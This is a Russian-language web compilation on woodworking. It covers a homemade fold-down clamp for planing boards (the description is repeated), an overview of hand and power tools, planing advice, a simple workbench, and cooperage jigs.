277 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Приспособления для строгания досок

Самодельный откидной зажим для строгания досок

Привет всем любителям самоделок!

На днях, будучи в гостях у своего отца, я увидел у него в мастерской на верстаке интересный самодельный зажим для досок. Поскольку отец в последние годы занимается строительством летнего домика и делает все своими руками, то ему приходится строгать много различного пиломатериала и в основном досок различной ширины.

Вот так, кстати, выглядит этот двухэтажный домик, который он уже успел построить, но еще не закончил до конца.

Под этим домиком отец также сделал еще и глубокий погреб для хранения овощей и садово-огородных заготовок. Причем все это он делал практически в одиночку, своими руками и мы с братом помогали ему лишь совсем немного.

Так вот из-за необходимости обрабатывать большое количество досок, отец сделал самодельный откидной зажим для досок, который позволяет быстро зажимать обрабатываемую доску, поставленную на верстак и также быстро снимать ее с верстака уже обработанную.

Мне этот зажим понравился и показался весьма полезным и эффективным так, что я решил и у себя в мастерской со временем сделать точно такой же. Ну а сейчас я хочу поделиться конструкцией этого зажима с читателями – возможно, кому-нибудь это приспособление также может оказаться полезным и нужным.

Итак, вот общий вид этого зажима.

Вообще, этот зажим состоит из двух основных элементов: деревянного упора, к которому приставляется и прижимается обрабатываемая доска и самого зажима.

Рассмотрим сначала упор. Как видно он сделан из отрезка фанеры, прикрепленного под острым углом шурупами к бруску из твердой древесины (бука). В этот отрезок фанеры упирается и дополнительно самоустанавливается (поджимается к бруску за счет острого угла) обрабатываемая доска.

Сам брусок крепится к дощечке, которая в свою очередь при помощи шурупов закреплена на верстаке.

Далее идет сам зажим, который состоит из трех основных элементов:

Во-первых, это сам винт с прижимной головкой из твердой резины и рукояткой отверточного типа, взятый от старой струбцины.

Во-вторых, самодельная втулка с двумя фланцами, которую отец вырезал из какой-то старой алюминиевой детали. В эту втулку ввернут и закреплен при помощи гайки сам прижимной винт с рукояткой.

В свою очередь эта втулка при помощи шурупов, которые вворачиваются в отверстия фланцев, крепится к торцу небольшого бруска из бука.

И наконец, третья деталь это сам брусок из бука, который вставлен в прорезь, сделанную в передней боковой стороне верстака, и насажен на ось из длинной шпильки.

Нижняя сторона бруска скруглена для того, чтобы он мог поворачиваться вокруг оси.

Для того чтобы брусок плотнее держался, но при этом поворачивался в прорези плавно и без особого трения, сбоку к нему прикреплен тонкий отрезок оргстекла.

Таким образом, данный зажим может поворачиваться вокруг оси на 180 градусов.
Вот его нижнее положение.

Это среднее положение.

А это верхнее, рабочее положение.

Поскольку деревянный брусок зажима держится в прорези верстака достаточно плотно, то во время работы для удобства, зажим можно оставлять в среднем положении.

Для начала работы нужно поставить на верстак доску, кромку которой нужно обстругать или обработать иным способом.

Затем придвинуть эту доску вплотную к упору и закрепить ее при помощи зажима. Все это делается очень быстро, буквально за пару секунд.

Так же быстро, обработанная доска снимается с верстака. Для этого нужно чуть открутить рукоятку зажима и откинуть его в среднее положение, чтобы он не мешал снимать обработанную доску и устанавливать на верстак новую.

Если же нужно прострогать широкую сторону доски, то есть положить ее плашмя, то для этого к верстаку дополнительно прикреплен квадратный отрезок фанеры, который используется в качестве упора.

Зажим при этом откидывается в нижнее положение.

Как я уже говорил выше, этот зажим показался мне весьма удобным в использовании. Так что со временем, я, наверное, сделаю себе такой же. Ну а также могу рекомендовать изготовить подобный зажим всем, кому часто приходится обрабатывать доски. Тем более что сделать его достаточно несложно.

Ну и на этом, пожалуй, все! Всем пока и продуктивной работы над самоделками в новом году!

Какой инструмент применяют для обработки дерева

Обрабатывать дерево люди научились много тысячелетий назад. Вначале, по понятным причинам, все делали вручную. Сегодня существует большое количество электроинструментов, но и ручные приспособления не остались забытыми. Инструмент для деревообработки необходим плотникам, столярам и любому человеку, который решил что-то изготовить своими руками.

Разнообразие инструментов

Под обработкой древесины понимают большое количество операций, и для каждой из них нужны свои инструменты. Дерево можно пилить, сверлить, стругать, вырезать из него предметы простой или замысловатой формы. Совокупность всех инструментов разделяют на две группы:

Кроме этого, их делят на профессиональные, любительские и относящиеся к промежуточной категории. В домашних условиях удобнее всего выполнять деревообработку любительскими или полупрофессиональными инструментами. К тому же цена их существенно меньше, чем профессиональных.

Ручной инструмент

Ручными называют те инструменты, при использовании которых задействована физическая сила человека. Поскольку деревообработкой занимались во времена, когда об электричестве никто не знал, все манипуляции с деревом можно выполнять вручную.

Одним из самых древних по происхождению считается топор. Его и сейчас используют в домашних условиях – во многих частных хозяйствах без топора не обойтись.

Ручными бывают пилы, сверла, стамески, рубанки и еще много чего. Работать ими надо аккуратно, умеючи. Без должной практики, навыков не обойтись, зачастую нужна немалая физическая сила.

Электроинструмент

Электрическими устройствами пользоваться легче. Они позволяют в несколько раз быстрее выполнить работу и с меньшими усилиями. Электроинструменты для деревообработки в домашних условиях выпускают работающие от сети и на аккумуляторах. Покупая такие агрегаты, надо обращать внимание на их мощность, гарантию обслуживания и основные возможности. В приоритете должны быть те функции, которыми вы планируете чаще всего пользоваться.

Стоит заметить, что электроинструмент тоже может быть ручным либо стационарным. Ручные электроинструменты для обработки дерева можно переносить, выполнять работы, держа его в руках. Во втором случае инструмент фиксирован, вмешательство человека минимальное, зачастую он представляет собой станок, который может быть токарным, долбежным, фрезеровочным, рейсмусовым.

Инструменты для распила древесины

Распилить древесину или материалы, из нее сделанные, можно несколькими видами инструментов:

Все они бывают ручными и электрическими. Ножовка идеально подходит для садовых работ, ею пилят не слишком толстые суки, доски, заготовки для столярных работ.

При постоянной распиловке древесины в домашних условиях просто необходимо иметь циркулярную пилу (циркулярку). Фигурные резы ею не сделать, зато она максимально быстро распиливает доски, фанеру, некоторые виды пластика.

Если надо пилить деревья, заготавливать дрова, то в этом случае используют цепные пилы. Встречаются также ручные пилы для заготовки леса, работать ими надо вдвоем.

Лобзиком выпиливают фигуры произвольной формы. Он подходит для выпиливания заготовок макетов, художественных панно, различных поделок, деталей мебели, кухонных приспособлений.

Топоры и колуны для раскалывания

Плотницкие работы испокон веков выполняли топорами. Ими обтесывали бревна, делали окна, двери, с их помощью возводили срубы. Топоры и колуны необходимы, чтобы раскалывать поленья на дрова. Топор определенного вида – это боевое оружие.

Обратите внимание! Отличаются инструменты для раскалывания по размерам, форме металлической части и рукоятки, которую делают из дерева или стеклопластика.

Сегодня выпускают электрические колуны (дровоколы), которыми можно быстро колоть поленья определенной длины и диаметра. Стоимость их на два порядка выше обычных качественных топоров.

Рубанки для строгания

Строгать древесину надо рубанком. Он снимает тонкий слой стружки, позволяя получить ровную гладкую поверхность. Без рубанка не обходится ни столяр, ни плотник. Используют их мастера музыкальных инструментов, мебели, кукол, кухонной утвари и многого другого.

Совет! При выборе электрического рубанка обращают внимание в первую очередь на его мощность, ширину лезвия и глубину строгания, заявленную производителем.

Неплохо иметь у себя целый набор рубанков, в крайнем случае хотя бы один универсальный. По мере освоения работы плотника или столяра появится необходимость в других видах рубанка.

Для грубого строгания используют медведку, для чистовой обработки подойдет фуганок или полуфуганок, выборку шпунта, пазов проводят пазником (шпунтубелем). Есть еще цикля, калевка и много других узкоспециализированных инструментов для строгания.

Шлифовальный и обдирочный инструмент

Чтобы сделать дерево идеально гладким, необходим шлифовальный инструмент. Маленькие фигурки и детали из древесины шлифуют вручную шлифовальной бумагой, наждачкой, совершая монотонные механические движения.

Чтобы заглаживать края, торцы изделий, применяют рашпили. Это специальные напильники для дерева с крупной насечкой.

Для больших площадей используют электрические деревообрабатывающие машинки, к ним относятся:

  • болгарки со шлифовальными насадками;
  • ленточные шлифмашинки;
  • эксцентриковые (орбитальные);
  • плоскошлифовальные (вибрационные).

Ленточный инструмент больше подходит для грубой зачистки, снятия толстого слоя краски или выравнивания поверхности. Более тонкую шлифовку проводят эксцентриковыми и плоскошлифовальными агрегатами.

Стамески и долота для долбления

Шипы и пазы в древесине для соединения деталей делают стамесками и долотом. Это ручной инструмент. Чтобы выдолбить глубокое и достаточно широкое гнездо или проушину, применяют долото. Рабочая часть долота – стальной, остро заточенный с одной стороны брусок.

Стамеской выдалбливают неглубокие отверстия, зачищают поверхность древесины, выполняют подгонку деталей. Форма лезвия у стамески может быть плоской или полукруглой.

Перед началом работ наносят разметку на деталь, затем ее прочно закрепляют в струбцине на верстаке и начинают выдалбливать. Волокна подрубают под углом 45–60°, углубляются каждый раз на 4–5 мм, стружку сразу же убирают.

Инструменты для сверления

Ручные дрели, коловороты, бурава необходимы для высверливания отверстий. Значительно проще проводить деревообработку электрической дрелью. Для нее понадобятся специальные насадки.

Существует большое количество видов насадок, среди них зенковочные, центровые (пёрки), спиральные, винтовые. Дрелью можно сверлить отверстия под болты, шиповые и другие виды соединений. Подбирая насадку нужной формы, можно расширить спектр выполняемых работ.

Фрезер

Один из важных электрических инструментов для деревообработки в домашних условиях – ручной фрезер. Им обтачивают кромку, делая ее скругленной, фигурной, вырезают пазы, сверлят отверстия. Выпускают различные виды фрезеров широкого и узкого спектра действия. Они отличаются по мощности, диаметру хвостовика фрезы, максимальной скорости вращения. Помимо дерева, фрезером обрабатывают гипсокартон, пластмассу, акрил.

Рабочее место и дополнительные приспособления

Проводя работы по деревообработке в домашних условиях, не получится обойтись без струбцин. Они помогают фиксировать детали поодиночке и между собой при резке, выдалбливании, сверлении, склейке.

Еще одни важные инструменты в деревообработке – это клещи и гвоздодеры. Ими из дерева вытаскивают гвозди, а также другие посторонние предметы.

В процессе деревообработки важно правильно подготовить рабочее место. Для слесарных работ необходим верстак. Это прежде всего стол, за которым удобно выполнять различные манипуляции. На верстаке также находятся полезные приспособления:

  • передний и задний винтовые зажимы для фиксирования заготовок;
  • отверстия под клинья, в которые упирается заготовка;
  • лоток для хранения столярного инструмента.

Возле верстака зачастую устанавливают стеллаж, где хранятся необходимые приспособления, материалы, шаблоны. Потребуется удобный стул. Необходимо также позаботиться о розетке для подключения электроинструмента и качественном освещении.

К дополнительным приспособлениям, которые всегда должны быть в наличии у любого мастера, относят линейки, транспортиры, уровни, угольники. Скорее всего, потребуется расходный материал (наждачная бумага, пилки, круги). Поскольку в домашней мастерской обычно налажен полный цикл производства, то надо отвести место для лака, красок, кисточек.

Любые инструменты должны находиться в исправном состоянии. Если же произошла поломка, то их как можно быстрее восстанавливают или же убирают в такое место, где они не будут мешать.

Электроинструменты для обработки дерева: обзор, особенности и советы по выбору

Деревообрабатывающий электроинструмент можно классифицировать по уровню и объему выполняемых работ:

  • профессиональный;
  • полупрофессиональные;
  • любительские.

Несмотря на популярность полимеров и металла при строительстве ввиду их практичности, долговечности и удобству работы, дерево добавляет любой постройке чувство комфорта, уюта и душевного равновесия, именно поэтому многие строители любят работать с древесиной.

Среди деревообрабатывающих инструментов есть ручные, электрические, а также «тяжелая артиллерия» — станки. В этой статье мы уделим внимание переносным электроинструментам для обработки древесины.

Сейчас уже для каждой операции по работе с деревом существует свой ручной электроинструмент, рассмотрим их подробнее.

Электролобзик

Подойдет для распила материалов небольшой толщины, однако основной функционал электрического лобзика – это фигурное выпиливание. Тонкое и узкое полотно придает гибкости и маневренности этому ручному электрическому инструменту, позволяя задавать нужное направление линии реза.

При выборе лобзика обратите внимание на наличие маятникого хода – это увеличивает его эффективность и повысит скорость работы. Но использовать этот режим нужно только при пилении «по прямой», иначе возрастает риск повреждения обрабатываемой поверхности.

В качестве расходки к электролобзикам прилагаются всевозможные пильные полотна, благодаря которых можно выбрать оптимальную точность и чистоту пропила, а также добиться максимальной скорости работы.

Электролобзик немного уступает ручному варианту себя – в ручном минимальный радиус изгиба линии реза меньше, что позволяет выполнять более точные работы.

В целом, работа электролобзиком – занятие для терпеливых и требует большой выдержки, аккуратности и кропотливости.

Что нужно знать при выборе

  • Чем тверже материал – тем ниже обороты;
  • Для ускорения используйте маятниковый ход (для мягких материалов);
  • Для «фигурной резки» и чистому пропилу жестких материалов маятниковый ход не нужен;
  • Чем выше обороты, тем чаще необходимо делать перерывы для «отдыха» инструмента.

Электрическая дисковая пила

Ее также называют циркулярной пилой, в простонародье – циркулярка. Основная задача электропилы – прямолинейный распил древесины. Например, если требуется «распустить» доску вдоль на две части.

Установкой нужного диска достигается необходимая глубина пропила. А модификация пилы с погружным механизмом позволит начать распил не с края изделия, а с середины. Также предусмотрет наклон пильного диска.

Электропила не справится с фигурным резом, зато может похвастать мощностью и скоростью.

Что нужно знать при выборе

  • Для больших объемов работ выбирайте модель с большей мощностью: сэкономит массу времени;
  • Обратите внимание на характеристику максимальной глубины резания;
  • Дополнительные «фишки», такие как регулятор оборотов, плавнй пуск и защита от перегрева сделют работу более комфортной;
  • Подберите наиболее подходящий пильный диск для обработки дерева определенной жесткости.

Ленточная шлифмашина

Этот тип шлифмашинок применяется для чернового шлифования. Используется для грубых поверхностей, либо для съема краски, позволяет снять довольно толстый слой древесины. После ленточной необходимо обработать поверхность орбиталкой или эксцентриковой шлифмашиной для более точной обработки.

Что нужно знать при выборе

  • Шлифование – процесс нудный и муторный, причем часто в неудобной позе. Более мощный аппарат немного сократит мучения;
  • Но не переусердствуйте: неумелые руки легко проделают в дереве вмятины, для исправления которых придется затратить немалое время;

Плоскошлифовальная шлифмашина

Еще ее называют вибрационной.

Используется для финишной обработки дерева, после того, как по нему прошлась ленточная. Также используется для полировки.

Что нужно знать при выборе

  • Параметр «амплитуда движения» отвечает за скорость работы, но при ее большом показателе результат работы потеряет в ювелирности;
  • Возможность регулирования частоты колебаний позволит подобрать нужный режим под любой тип поверхности;

Эксцентриковая шлифмашина

Также известна как орбитальная.

Для чистовой обработки и полирования, очень удобна, когда имеем дело с изгонутыми изделями.

Принцип выбора аналогичен выбору плоскошлифовальной машинки,

Что нужно знать при выборе

Процесс шлифования – одна из тех деревообрабатывающих операций, занимающих продолжительное время, поэтому запаситесь терпением, а также защитной маской, ведь пыли будет очень много.

Электрорубанок

Основная задача – строгать. Также можно использовать для подгонки досок и обтески.

Что нужно знать при выборе

Электроножовка

Также известна как сабельная пила, а в простонародье именуемая «пила-аллигатор»

По принципу работы полностью повторяет классическую ручную ножовку, только возвратно-поступательное движение придается за счет электрической энергии, а не вашей руки.

В отличие от циркулярки сабельная пила работает грязнее, медленнее и грубее, но с ней безопаснее работать. Однако есть у аллигатора и преимущества: глубина пропила, которая ограничивается только длиной пильного полотна (а они сменные, так что в магазине всегда можно найти расходку под любую задачу), и возможность работать в труднодоступных местах.

Что нужно знать при выборе

  • Параметр регулировки скорости хода полотна позволит выбрать оптимальный режим исходя из жесткости древесины;
  • Чем выше мощность, тем быстрее вы разделаетесь с поставленной задачей;
  • Чем длиннее полотно, тем на более толстую толщину доски можно замахнуться.

Фрезер

Как видно из названия, нужен для фрезировки, а именно снятия фасок, выборки четверти и резки пазов и шлицов.

На что обратить внимание

Весь собранный здесь инструмент чаще всего подойдет не только для деревообрабатывающих операций, но и для работы с другими материалами: пластик, металл, фанера. Нужно только подобрать подходящую расходку.

Как строгать доску

Процесс острожки доски требует ответственности, внимательности и точности

В данном материале мы поговорим о том, как строгать широкую доску, да и вообще о процессе острожки. Основная его задача – это получение идеально ровной плоскости без перепадов высоты. Также этот этап является подготовительным перед эстетической обработке древесины. Только после острожки вы сможете отполировать доску и покрыть ее специальными декорирующими составами или лаком. Выполняется подобная процедура несколькими способами, и следующая таблица даст вам примерное описание этих процессов.

Наглядное сравнение остроганной и первоначальной поверхности

Если вы не знаете, как рассчитать кубатуру бруса на дом, то в этом вам поможет следующая таблица.

При помощи рубанка

Ручной способ, который требует крупных трудозатрат. Как правило, позволяет обрабатывать не слишком широкие поверхности и не дает идеальный результат. Требует навыков владения рубанком.

При помощи электрорубанка

Также ручной способ, однако менее затратный, нежели в первом случае. При этом есть модели электрорубанков, позволяющие работать с внушительными по ширине досками.

При помощи рейсмуса

Рейсмус – это компактный строгальный станок, который может применяться в бытовых условиях. Позволяет добиться максимально качественного результата, однако не обеспечивает большие объемы работы.

При помощи строгального станка

Профессиональный способ, позволяющий работать с широким спектром размеров материала. Кроме этого обеспечивает практически идеальный результат.

Как строгать доску электрорубанком

Электрорубанок – инструмент значительно упрощающий процесс острожки

Перейдем к тому, как строгать широкую доску электрорубанком. Задача эта не из простых, хотя конечно, легче, чем работа обыкновенным ручным рубанком. Дело в том, что от вас зависит равномерность острожки, которая регулируется силой нажима на аппарат. При этом усилие должно оказываться с постоянным одинаковым усилием. Иначе поверхность, которую вы строгаете получится неоднородной. Особенно это касается широких досок, где нужно проходить рубанком в несколько линий. Первый прогон – пристрелочный, он задаст глубину снятия поверхности для всех остальных прогонов. Теперь о том, как все-таки правильно строгать доски электрорубанком. Как мы уже сказали, очень важна равномерность нажима на поверхность и постоянство прикладываемых усилий. Кроме этого важно вести рубанок по прямой траектории, не отходя в сторону. Помочь в этом сможет предварительная разметка или лазерный уровень. Ну и также очень важно правильно расположить доску. Она должна лежать на идеально ровной поверхности, тогда результат будет максимальным. Кстати, есть более продвинутая версия электрорубанка – рейсмус, с его помощью процесс контроля ровности острожки становится более простым.

Так выглядит рейсмус

На чем строгать доску

Идеальное приспособление – верстак. Так что если вы не знаете, на чем строгать доску, озаботьтесь созданием или покупкой верстака. Он обеспечит простую и эффективную работу без излишних хлопот.

Если вам нужны качественные пиломатериалы такие как: обрезная доска, брус и др., обращайтесь к нам!

Использование верстака значительно упростит процесс работы с рубанком

Приспособления для строгания досок

Самодельный откидной зажим, который можно применять для строгания и других видов обработки досок. Позволяет быстро фиксировать обрабатываемую доску и также быстро снимать ее после обработки.

Привет всем любителям самоделок!

На днях, будучи в гостях у своего отца, я увидел у него в мастерской на верстаке интересный самодельный зажим для досок. Поскольку отец в последние годы занимается строительством летнего домика и делает все своими руками, то ему приходится строгать много различного пиломатериала и в основном досок различной ширины.

Вот так, кстати, выглядит этот двухэтажный домик, который он уже успел построить, но еще не закончил до конца.

Под этим домиком отец также сделал еще и глубокий погреб для хранения овощей и садово-огородных заготовок. Причем все это он делал практически в одиночку, своими руками и мы с братом помогали ему лишь совсем немного.

Так вот из-за необходимости обрабатывать большое количество досок, отец сделал самодельный откидной зажим для досок, который позволяет быстро зажимать обрабатываемую доску, поставленную на верстак и также быстро снимать ее с верстака уже обработанную.

Мне этот зажим понравился и показался весьма полезным и эффективным так, что я решил и у себя в мастерской со временем сделать точно такой же. Ну а сейчас я хочу поделиться конструкцией этого зажима с читателями – возможно, кому-нибудь это приспособление также может оказаться полезным и нужным.

Итак, вот общий вид этого зажима.

Вообще, этот зажим состоит из двух основных элементов: деревянного упора, к которому приставляется и прижимается обрабатываемая доска и самого зажима.

Рассмотрим сначала упор. Как видно он сделан из отрезка фанеры, прикрепленного под острым углом шурупами к бруску из твердой древесины (бука). В этот отрезок фанеры упирается и дополнительно самоустанавливается (поджимается к бруску за счет острого угла) обрабатываемая доска.

Сам брусок крепится к дощечке, которая в свою очередь при помощи шурупов закреплена на верстаке.

Далее идет сам зажим, который состоит из трех основных элементов:

Во-первых, это сам винт с прижимной головкой из твердой резины и рукояткой отверточного типа, взятый от старой струбцины.

Во-вторых, самодельная втулка с двумя фланцами, которую отец вырезал из какой-то старой алюминиевой детали. В эту втулку ввернут и закреплен при помощи гайки сам прижимной винт с рукояткой.

В свою очередь эта втулка при помощи шурупов, которые вворачиваются в отверстия фланцев, крепится к торцу небольшого бруска из бука.

И наконец, третья деталь это сам брусок из бука, который вставлен в прорезь, сделанную в передней боковой стороне верстака, и насажен на ось из длинной шпильки.

Нижняя сторона бруска скруглена для того, чтобы он мог поворачиваться вокруг оси.

Для того чтобы брусок плотнее держался, но при этом поворачивался в прорези плавно и без особого трения, сбоку к нему прикреплен тонкий отрезок оргстекла.

Таким образом, данный зажим может поворачиваться вокруг оси на 180 градусов.
Вот его нижнее положение.

Это среднее положение.

А это верхнее, рабочее положение.

Поскольку деревянный брусок зажима держится в прорези верстака достаточно плотно, то во время работы для удобства, зажим можно оставлять в среднем положении.

Для начала работы нужно поставить на верстак доску, кромку которой нужно обстругать или обработать иным способом.

Затем придвинуть эту доску вплотную к упору и закрепить ее при помощи зажима. Все это делается очень быстро, буквально за пару секунд.

Так же быстро, обработанная доска снимается с верстака. Для этого нужно чуть открутить рукоятку зажима и откинуть его в среднее положение, чтобы он не мешал снимать обработанную доску и устанавливать на верстак новую.

Если же нужно прострогать широкую сторону доски, то есть положить ее плашмя, то для этого к верстаку дополнительно прикреплен квадратный отрезок фанеры, который используется в качестве упора.

Зажим при этом откидывается в нижнее положение.

Как я уже говорил выше, этот зажим показался мне весьма удобным в использовании. Так что со временем, я, наверное, сделаю себе такой же. Ну а также могу рекомендовать изготовить подобный зажим всем, кому часто приходится обрабатывать доски. Тем более что сделать его достаточно несложно.

Ну и на этом, пожалуй, все! Всем пока и продуктивной работы над самоделками в новом году!

Очередь просмотра

Очередь

  • Удалить все
  • Отключить

YouTube Premium

Хотите сохраните это видео?

  • Пожаловаться

Пожаловаться на видео?

Понравилось?

Не понравилось?

Текст видео

Конструкцию этой прилады я увидел на одном из буржуйских каналов, и она мне очень понравилась. Заморачиваться с хорошими дорогими материалами я не стал, и сделал всё из подручных материалов.
Доска для строгания рубанком удобна тем, что ей можно пользоваться без столярных тисков. На этой доске можно обрабатывать заготовки небольшого размера, но кроме строгания это приспособление можно использовать и для отпиливания небольших деталей.
Буду рад, если доска для строгания в моём исполнении кому-то понравится.

P.S. Когда я снимал этот ролик, то ещё не ведал, как правильно называется эта прилада. Теперь знаю, что это обычное столярное донце. Это был первый, пробный экземпляр. Скоро буду изготавливать более серьёзное донце для серьёзной работы. Подписывайтесь на мой канал.

В съёмках принимали участие:

Вы можете поддержать мой канал, перечислив любую сумму по указанным реквизитам.
Все деньги будут направлены на приобретение материалов и закупку необходимого оборудования для мастерской.

Так же, я всегда открыт для любого сотрудничества.

Яндекс деньги: 410013635710435
WebMoney: R341328275651

Две широкие толстые доски кладут на прочно сколоченную подставку, конструкция которой хорошо понятна из рисунка. Основные размеры стелюги таковы: ширина крышки 600—700 мм, длина 1200—1500 мм, общая высота 600—900 мм от пола.

Лучше всего высоту стелюги подбирать опытным путем. Для этого нужно встать вплотную к верстаку и положить ладони рук на крышку. Если ладони рук ложатся полностью и руки в локтях не согнуты, то, следовательно, высота стелюги подобрана правильно. Если указанное выше условие не выполняется, то, соответственно, стелюгу нужно сделать выше или ниже.

В передней части стелюги сделайте упор с угловым вырезом.


Рис. 1 Упрощенный верстак — стелюга: 1 — верхний упор; 2 — боковой упор; 3 — поддерживающий выдвижной брусок; 4 — вырез для установки материала вертикально; 5 — закрепляющий клин
Рис. 2 Приспособления для крепления доски на крышке стелюги: а — упор с гвоздями для строжки пласти доски; б — улучшенные зажимы

Для удобства строгания пласти доски в торец упора надо вбить снизу косо гвозди так, как показано на рис. 2а. Доска при строгании своим торцом будет накалываться на острие гвоздей и при обратном, холостом ходе рубанка не будет скользить.

При строгании кромок деталей применяют боковой клиновый зажим. Как сделать его, понятно из рис. 4б.

Для случая, когда требуется зажать обрабатываемую деталь в вертикальном положении, сделайте паз, в котором с помощью пологого клина можно прочно закрепить деталь.

Лучшими материалами для изготовления стелюги (верстака) считаются бук, береза и другие твердые породы древесины. Весь материал, используемый для ее изготовления, должен быть хорошо выдержанным, т. е. сухим, без трещин, больших сучков и других пороков. Чтобы стелюга (верстак) не растрескалась и не разбухла, ее нужно тщательно пропитать горячей олифой (особенно крышку). Для этого олифу нужно разогреть и с помощью широкой кисти покрасить стелюгу два-три раза. После каждого покрытия надо делать перерыв не менее суток, необходимый для высыхания ранее нанесенного слоя.

В качестве верстака можно с успехом использовать любой подходящий стол. Если у Вас есть возможность постоянно работать на таком столе, его необходимо оборудовать приспособлениями, о которых говорилось выше. В случае, если крышка стола тонкая, на нее следует настелить тщательно подогнанные доски толщиной 20—30 мм.

Когда нет возможности пользоваться столом для постоянной работы, можно сделать съемную доску, которая при работе крепится к столу с помощью струбцин. После окончания работы ее легко снять, а стол использовать по его основному назначению. Доску можно оборудовать упором на петле (рис. 3).


Рис. 3 Съемная доска с откидным упором

Рис. 4 Использование лестницы в качестве временной стелюги

Инструменты и приспособления для бондарных работ

Приятно следить за работой бочара, когда она спорится. Однако спорая и искусная работа зависит не только от опыта и сноровки бочара. Во многом ее определяют удобные и надежные инструменты и приспособления. Каждый инструмент бочар делает сам по своей руке, а станок — по своему росту. Бочар упорно добивается, чтобы рукоятка, скажем, скобелки, лежала в руке как влитая.

Такой же подход к бондарным станкам и приспособлениям: они должны быть просты, удобны в работе, компактны и по возможности более универсальны. В старину бочары чаще всего строгали клепки скобелем, зажимая их в тисках бондарной скамьи.

Сейчас вместо скобеля предпочитают использовать рубанки с выпуклыми и прямыми подошвами, а вместо бондарной скамьи — столярный верстак или самодельную верстачную доску. Для мастерской, имеющей небольшие размеры, используют съемную верстачную доску. Ее укрепляют на основании (подверстачье), собранном из сухих березовых брусьев, или же на обычном столе, имеющем хорошую устойчивость. Верстачную доску склеивают из березовых досок и брусков. Для прочности все части стягивают болтами, головки которых должны быть обязательно утоплены. Образовавшиеся гнезда заделывают деревянными пробками.

Самодельная верстачная доска, ее узлы и детали (а — зажимное приспособление из струбцины; б — упорные клинья; в — различные способы закрепления клепок)

Примерно в середине верстачной доски оставляют специальный проем с продольными пазами вдоль стенок. В них вставляют полозы зажимной колодки. В середине колодки проводят карандашом прямую продольную линию, на уровне которой выдалбливают два прямоугольных отверстия — так называемые гнезда. Продолжив карандашную линию, на самой верстачной доске также долбят пять-шесть отверстий.

Для перемещения зажимной колодки вдоль верстачной доски используют винт с крупной ленточной резьбой и с воротком на одном конце. Если такой винт не найдется, для зажимного устройства подойдет сломанная струбцина. Один конец струбцины отпиливают ножовкой по металлу и, просверлив два отверстия привинчивают с двух сторон прочные уголки. С помощью них струбцину крепят снизу к верстачной доске. В коническом упоре струбцины сверлят три отверстия и прикрепляют его к торцу колодки шурупами.

Клепки, предназначенные для строгания, удерживаются на верстачной доске упорными клиньями, которые вставляют в прямоугольные гнезда, выдолбленные в упорной колодке и верстачной доске. Упорные клинья делают из дерева или металла. Деревянные клинья изготовляют из твердой и прочной древесины яблони, груши, рябины или клена. Чтобы каждый деревянный клин надежно удерживал клепку, к нему привинчивают шурупами металлическую пластинку с зубчатым гребешком на конце.

Прикрепленная сбоку пластинчатая пружина помогает удерживать упорный клин в гнезде на нужном уровне. Такую же пружину должны иметь и металлические упорные клинья.

Используя пилу-наградку и стамеску, поперек верстачной доски выбирают два паза, имеющих в сечении трапецию. При строгании внутренней стороны клепки в пазы вставляют шпонки с полукруглыми вырезами в верхней части. Их изгиб должен соответствовать выпуклой поверхности обрабатываемой клепки. Когда приступают к строганию внешней стороны клепки, то в пазы вставляют шпонки, верхняя грань которых заподлицо с поверхностью верстачной доски.

Готовую верстачную доску покрывают два-три раза горячей олифой, разбавленной скипидаром. Так же обрабатывают и другие приспособления и инструменты, в том числе и бондарную скамью.

Два вида бондарных скамей и устройство одной из них (А — опорная доска; Б — головка; В — брусок; Г — болт; Д — зажимной рычаг; Е — педали; Ж — подкосы)

Бондарная скамья — это своеобразный верстак с тисками, удерживающими клепку во время строгания. Ножки скамьи для прочности укреплены подкосами. Под углом 20—30° с одного края к скамье прибита опорная доска. Чтобы угол ее наклона к сиденью был постоянным, под доской укрепляют вертикальный брусок. В прямоугольное отверстие, вырезанное рядом с бруском, вставлен зажимной рычаг, в котором просверлены два отверстия.

Снизу выступа к так называемой головке прибит отрезок стальной крученой проволоки. Рычаг укреплен в скамье болтом. В нижнее отверстие рычага вбита круглая палка — она заменяет педали. Перед началом строгания бондарь садится на скамью, кладет клепку на опорную доску и ногой нажимает на одну из педалей. При этом головка рычага наклоняется и прижимает клепку к доске. Крученая проволока, вбитая в головку, способствует более надежному удерживанию клепки. Строгание выполняют стругом или скобелем.

Фугование клепок. Со старинной гравюры. Внизу: использование столярного фуганка для фугования мелких клепок

Бондарный фуганок предназначен для строгания узких кромок клепки под заданным углом. По сути дела — это обычный фуганок, только перевернутый и значительно длиннее (до 1,5 м). Две передние ножки его сделаны немного короче задних. Такое положение фуганка облегчает процесс строгания клепок. Имеющиеся в продаже столярные фуганки и полуфуганки с колодками длиной 700 и 500 мм можно приспособить для строгания узких кромок коротких клепок, предназначенных, например, для сборки настольной посуды (кружек, жбанов и т.п.). Колодку столярного фуганка или полуфуганка закрепляют в тисках верстака подошвой вверх. При этом ее слегка наклоняют вперед.

Приспособление для строгания кромок клепок и его устройство (а — колода; б — зажимной колышек; в — металлическая скоба; г — лекало; д — рычаг; е — зацеп; ж — глухие отверстия)

Для строгания кромок клепок под точно заданным углом применяют специальное приспособление — ладило. Основная деталь его — колода, вырубленная из дуба или березы. В колоде выдолблен сквозной проем, предназначенный для размещения лекала и обрабатываемой заготовки. Лекало — это доска, одна широкая грань (пласть) которой имеет кривизну, соответствующую внешней выпуклой поверхности обрабатываемой клепки. Для каждого бондарного изделия вырезают два лекала. Одно — для строгания левых узких кромок клепок, другое — для правых. Сбоку колоды просверлено отверстие, в которое вставлен зажимный колышек.

Рядом с отверстием крепят металлическую скобу, в которую свободно входит рычаг. Перед строганием клепку вкладывают в колоду и с помощью рычага прижимают колышком к лекалу. Свободный конец рычага прикрепляют к торцу колоды прочной веревкой с болтом на конце. (В колоде заранее просверливают несколько отверстий, в одно из которых и вставляют болт.) При необходимости клепку крепят в колоде клиньями.

Приспособления для стягивания бочечных клепок (а — столбовой ворот; б — цепная стяжка; в — рамочный станок-ворот)

Бондарный ворот предназначен для стягивания клепок в остове перед надеванием рабочих и постоянных обручей, особенно уторных. Известно множество конструкций воротов. Самый простой, применявшийся старыми мастерами, состоял из вертикального вращающегося столба, который закрепляли в мастерской между потолком и полом. К столбу привязывали толстую конопляную веревку, которой обвивали распущенный конец остова, а свободный конец закрепляли на скобе, вбитой в стену. В отверстие, просверленное в столбе, вставляли лом. На вращаемый ломом столб наматывалась веревка, петля вокруг бочки уменьшалась и прочно стягивала концы клепок.

